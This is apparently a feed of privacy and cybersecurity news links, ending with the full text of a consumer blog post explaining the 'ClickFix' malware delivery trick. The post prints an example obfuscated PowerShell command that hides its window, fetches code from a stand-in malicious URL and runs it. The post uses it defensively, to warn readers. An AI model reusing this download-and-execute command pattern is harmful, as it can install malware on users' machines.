The New Oil

The Government Must Not Force Companies to Participate in #AI-powered #Surveillance

https://www.eff.org/deeplinks/2026/03/government-must-not-force-companies-participate-ai-powered-surveillance

#politics #privacy

New 'Zombie ZIP' technique lets malware slip past security tools A new technique dubbed "Zombie ZIP" helps conceal payloads in compressed files specially created to avoid detection from security solutions such as antivirus and endpoint detection and response (EDR) products.

New '#ZombieZIP' technique lets #malware slip past security tools

https://www.bleepingcomputer.com/news/security/new-zombie-zip-technique-lets-malware-slip-past-security-tools/

#cybersecurity

DHS Ousts CBP Privacy Officers Who Questioned ‘Illegal’ Orders Department of Homeland Security leaders removed top privacy officers who objected to mislabeling government records to block their public release, WIRED has learned.

#DHS Ousts #CBP #Privacy Officers Who Questioned ‘Illegal’ Orders

https://www.wired.com/story/cbp-privacy-threshold-analysis-foia/

#politics

#Microsoft #Azure CTO set #Claude on his 1986 #AppleII code, says it found vulns

https://www.theregister.com/2026/03/09/claude_legacy_code_vulns/

#cybersecurity #AI

Microsoft March 2026 Patch Tuesday fixes 2 zero-days, 79 flaws Today is Microsoft's March 2026 Patch Tuesday with security updates for 79 flaws, including 2 publicly disclosed zero-day vulnerabilities.

#Microsoft March 2026 #PatchTuesday fixes 2 zero-days, 79 flaws

https://www.bleepingcomputer.com/news/microsoft/microsoft-march-2026-patch-tuesday-fixes-2-zero-days-79-flaws/

#cybersecurity #Windows

HPE warns of critical AOS-CX flaw allowing admin password resets Hewlett Packard Enterprise (HPE) has patched multiple security vulnerabilities in the Aruba Networking AOS-CX operating system, including several authentication and code execution issues.

#HPE warns of critical #AOSCX flaw allowing admin password resets

https://www.bleepingcomputer.com/news/security/hpe-warns-of-critical-aos-cx-flaw-allowing-admin-password-resets/

#cybersecurity

#KeePassXC 2.7.12 released

https://keepassxc.org/blog/2026-03-10-2.7.12-released/

#cybersecurity #FOSS #PasswordManager

Microsoft brings phishing-resistant Windows sign-ins via Entra passkeys Microsoft is rolling out passkey support for Microsoft Entra on Windows devices, adding phishing-resistant passwordless authentication via Windows Hello. [...]

#Microsoft brings #phishing-resistant #Windows sign-ins via #Entra #passkeys

https://www.bleepingcomputer.com/news/microsoft/microsoft-entra-brings-phishing-resistant-sign-in-to-windows/

#cybersecurity

New KadNap botnet hijacks ASUS routers to fuel cybercrime proxy network A newly discovered botnet malware called KadNap is targeting primarily ASUS routers and other edge networking devices to turn them into proxies for malicious traffic.

New #KadNap #botnet hijacks #ASUS routers to fuel #cybercrime #proxy network

https://www.bleepingcomputer.com/news/security/new-kadnap-botnet-hijacks-asus-routers-to-fuel-cybercrime-proxy-network/

#cybersecurity

#YouTube expands #AI #deepfake detection to politicians, government officials, and journalists

https://techcrunch.com/2026/03/10/youtube-expands-ai-deepfake-detection-to-politicians-government-officials-and-journalists/

#privacy

Viral 'Quittr' Porn Addiction App Exposed the Masturbation Habits of Hundreds of Thousands of Users A couple of 20-year-old developers make $500,000 a month promising to help men to stop watching porn, but exposed their private porn watching habits.

Viral '#Quittr' #Porn Addiction App Exposed the Masturbation Habits of Hundreds of Thousands of Users

https://www.404media.co/viral-quittr-porn-addiction-app-exposed-the-masturbation-habits-of-hundreds-of-thousands-of-users/

#nsfw #privacy #cybersecurity #DataBreach

CISA: Recently patched Ivanti EPM flaw now actively exploited CISA flagged a high-severity Ivanti Endpoint Manager (EPM) vulnerability as actively exploited in attacks and ordered U.S. federal agencies to patch systems within three weeks.

CISA: Recently patched #Ivanti #EPM flaw now actively exploited

https://www.bleepingcomputer.com/news/security/cisa-recently-patched-ivanti-epm-flaw-now-actively-exploited/

#cybersecurity

Microsoft to enable Windows hotpatch security updates by default Microsoft will turn on hotpatch security updates by default for all eligible Windows devices managed through Microsoft Intune and the Microsoft Graph API, beginning with the May 2026 Windows security update.

#Microsoft to enable #Windows #hotpatch security updates by default

https://www.bleepingcomputer.com/news/microsoft/microsoft-to-enable-hotpatch-security-updates-by-default-in-may/

#cybersecurity

APT28 hackers deploy customized variant of Covenant open-source tool The Russian state-sponsored APT28 threat group is using a custom variant of the open-source Covenant post-exploitation framework for long-term espionage operations.

#APT28 hackers deploy customized variant of #Covenant #OpenSource tool

https://www.bleepingcomputer.com/news/security/apt28-hackers-deploy-customized-variant-of-covenant-open-source-tool/

#cybersecurity #Russia

Paying without Google: New consortium wants to remove custom ROM hurdles Using banking and payment apps on Android smartphones with custom ROMs is a problem: A European industry consortium now wants to change that.

Paying without #Google: New consortium wants to remove custom #ROM hurdles

https://www.heise.de/en/news/Paying-without-Google-New-consortium-wants-to-remove-custom-ROM-hurdles-11204037.html

#FOSS #OpenSource #Android #privacy #Europe

Microsoft Teams phishing targets employees with backdoors Hackers contacted employees at financial and healthcare organizations over Microsoft Teams to trick them into granting remote access through Quick Assist and deploy a new piece of malware called A0Backdoor.

#Microsoft #Teams #phishing targets employees with #A0Backdoor #malware

https://www.bleepingcomputer.com/news/security/microsoft-teams-phishing-targets-employees-with-backdoors/

#cybersecurity

Google: Cloud attacks exploit flaws more than weak credentials Hackers are increasingly exploiting newly disclosed vulnerabilities in third-party software to gain initial access to cloud environments, with the window for attacks shrinking from weeks to just days.

Google: Cloud attacks exploit flaws more than weak credentials

https://www.bleepingcomputer.com/news/security/google-cloud-attacks-exploit-flaws-more-than-weak-credentials/

#cybersecurity

The #SAFE Act is an Imperfect Vehicle for Real #Section702 Reform

https://www.eff.org/deeplinks/2026/03/safe-act-imperfect-vehicle-real-section-702-reform

#privacy #politics #surveillance #MassSurveillance

addy.io has partnered with EasyOptOuts | addy.io We're excited to share that addy.io has partnered with EasyOptOuts, an automated data removal service that scrubs your name, address, and phone number from 200+ data brokers and people-search sites.

#addy(dot)io has partnered with #EasyOptOuts

https://addy.io/blog/addy-io-has-partnered-with-easyoptouts/

#privacy

Ericsson US discloses data breach after service provider hack Ericsson Inc., the U.S. subsidiary of Swedish networking and telecommunications giant Ericsson, says attackers have stolen data belonging to an undisclosed number of employees and customers after hacking one of its service providers.

#Ericsson US discloses #DataBreach after service provider hack

https://www.bleepingcomputer.com/news/security/ericsson-us-discloses-data-breach-after-service-provider-hack/

#privacy #cybersecurity

ShinyHunters claims ongoing Salesforce Aura data theft attacks Salesforce is warning customers that hackers are targeting websites with misconfigured Experience Cloud platforms that give guest users access to more data than intended. However, the ShinyHunters extortion gang claims to be actively exploiting a new bug to steal data from instances.

#ShinyHunters claims ongoing #Salesforce #Aura data theft attacks

https://www.bleepingcomputer.com/news/security/shinyhunters-claims-ongoing-salesforce-aura-data-theft-attacks/

#cybersecurity

#SaltTyphoon is hacking the world’s phone and internet giants — here’s everywhere that’s been hit

https://techcrunch.com/2026/03/09/salt-typhoon-china-who-has-been-hacked-global-telecom-giants/

#cybersecurity #China

#FBI warns of #phishing attacks impersonating US city, county officials

https://www.bleepingcomputer.com/news/security/fbi-warns-of-phishing-attacks-impersonating-us-city-county-officials/

#cybersecurity

瑞士公投将使用现金的权利写入国家宪法 Swiss vote places right to use cash in country''s constitution (www.politico.eu) 05:26  ↑ 103 HN Points

Swiss vote places right to use #cash in country’s constitution

https://www.politico.eu/article/switzerland-cash-right-constitution-vote/

#Switzerland #privacy #PersonalFinance #finance

Privacy International's response to the UK Home Office consultation on facial recognition technology Privacy International submitted a response to the UK Home Office

#PrivacyInternational's response to the #UK #HomeOffice consultation on #FacialRecognition technology

https://privacyinternational.org/advocacy/5741/privacy-internationals-response-uk-home-office-consultation-facial-recognition

#FRT #privacy #surveillance

#PrivacyInternational & Women on Web - Securing Reproductive Justice: A Guide to Digital #Privacy for Sexual and Reproductive Justice Activists

https://privacyinternational.org/long-read/5742/privacy-international-women-web-securing-reproductive-justice-guide-digital-privacy […]

Privacy International's submission on the impact of digital and AI-assisted surveillance on assembly and association rights

#PrivacyInternational's submission on the impact of digital and #AI-assisted #surveillance on assembly and association rights

https://privacyinternational.org/advocacy/5740/privacy-internationals-submission-impact-digital-and-ai-assisted-surveillance

#privacy #activism #protesting

10 Years of Cryptomator – Thank You All For Cryptomator’s 10th anniversary, we look back at key milestones, celebrate community voices, and share what’s next—including our AMA, new features, and a special anniversary sale.

10 Years of #Cryptomator (Anniversary #Sale)

https://cryptomator.org/blog/2026/03/09/10-years-cryptomator/

#FOSS #cybersecurity

Ubuntu, Fedora, Linux Mint Discuss Age Verification Amid California Law Backlash California's upcoming Digital Age Assurance Act law requires OSes to let users input their birth date during the setup to follow child privacy rules. The post Ubuntu, Fedora, Linux Mint Discuss Age Verification Amid California Law Backlash appeared first on 9to5Linux - do not reproduce this article without permission. This RSS feed is intended for readers, not scrapers.

#Ubuntu, #Fedora, #LinuxMint Discuss #AgeVerification Amid #California Law Backlash

https://9to5linux.com/ubuntu-fedora-linux-mint-eye-age-verification-amid-california-law-backlash

#Linux #Mint #FOSS #privacy

Fixing ClickFix There’s a very potent, very effective new malware delivery mechanism dubbed ClickFix, accounting for over half of all infections last year. I’ll tell you how to avoid it – and why you shouldn’t have to. ## What is ClickFix? We’re getting used to seeing CAPTCHAs that make us do weird things to prove that we’re real humans. (This is becoming increasingly ironic as we deploy “agentic” AI bots to do things on our behalves.) But the bad guys have come up with a devilishly clever way to exploit this and similar situations to trick us into installing malware. The attack is called “ClickFix”, though there are other variants. So, how does this work? The bad guys need to get you to a malicious web page. This can happen in many ways, from clicking on a malicious ad (called “malvertising”), or a “sponsored” link in search results, or a link from a phishing email – either in the email itself or in an attached file. You may also run across scams like this on shady sites, like for pirated software or movies. But however you get there, you will see some sort of message or error along these lines: * Please verify that you’re a human (CAPTCHA) * Browser verification failed * Additional verification required * Please run this command to continue * App has crashed, run this command to scan for problems or fix the issue An actual ClickFix example is shown below. Actual ClickFix example ## How ClickFix Works When you’re in a web browser on a desktop computer, you have several layers of protection. Browsers are “sandboxed” and can’t directly run commands on your computer. Most have some sort of download protections, including marking any file downloaded from the internet with a “mark of the web“. This mark tells your computer to be extra careful when opening these documents, particularly if they try to install something or run commands. And some of us have third party antivirus software (though I don’t recommend this) that would also try to prevent you from downloading malware. But ClickFix works by tricking you into bypassing all of these protections. Let’s look at the example above. Here’s what is actually going on. 1. The malicious web page that shows this message has automatically loaded your system clipboard with a computer command. That is, the page has surreptitiously copied some hidden text so that it’s ready to paste. 2. The “Win + R” key combination on a Windows computer will open up a Run dialog which allows you to execute commands as text (as opposed to the usual graphical user interface). 3. The “Ctrl + V” key combination will paste the contents of the clipboard into the Run dialog. This is the malicious computer command that was pre-copied to the clipboard when you visited the attacker’s web page. 4. And finally, hitting “Enter” will tell your computer to execute the malicious command. The command itself is often obfuscated so it’s difficult to tell what it’s really doing. Here’s an example command: powershell -NoP -W Hidden -C $a="https://mal"; $b="waresite.com/update"; $u=$a+$b; iex (irm $u) # browser verification step This command opens a (hidden) PowerShell window, downloads a malicious command from a website (which is obfuscated by breaking it into two parts) and executes the command. You’ve just told your computer to install malware, which it will happily do. If the command is really long, like this one, it will scroll to the end and all you might see is the benign-looking comment at the end. You might also be asked to open File Explorer because you can paste and run commands in the address bar. On a Mac, you’d be asked to open a Terminal window instead of a Run dialog. All different ways to do the same thing. ## Fixing ClickFix So, now that you know how this works, the solution is to just ignore the directions like this, no matter how authentic they look or how dire or innocuous they sound. Close the web page and pat yourself on the back. But here’s the bottom line: you shouldn’t _have_ to worry about this. This is a failing of the operating system (OS). Apple and Microsoft need to address this problem in macOS and Windows, and they should do it ASAP. How? I can think of a few ideas… 1. Everything copied to the clipboard (anything that can be subsequently pasted) should know and remember where it came from. Any text placed on your clipboard by a website should be flagged as suspicious (like the ‘mark of the web’). Your OS should then warn you before pasting this text into a Run dialog, Terminal window, or anywhere else that could execute a computer command. 2. You should have an easy way to inspect the content of your clipboard (without having to paste it somewhere), including the provenance of what’s stored there. 3. Web browsers should not be able to automatically put text on your clipboard without any user action whatsoever. It should at least be a setting you can toggle (defaulting to not allowing it). People that do a lot of computer programming copy and paste commands to run all the time. I know I do. So we would need some ways to disable constant warnings in those cases, maybe for a limited amount of time (‘stop warning me for 2 hours’). But by default, the OS should be making it a lot harder to paste commands from the web into a terminal and execute them. We should not be counting on training billions of people to avoid ClickFix-style attacks. #### Need practical security tips? Sign up to receive Carey's favorite security tips + the first chapter of his book, _Firewalls Don't Stop Dragons_. Don't get caught with your drawbridge down! **Get started**

Fixing #ClickFix

https://firewallsdontstopdragons.com/fixing-clickfix/

#cybersecurity #guide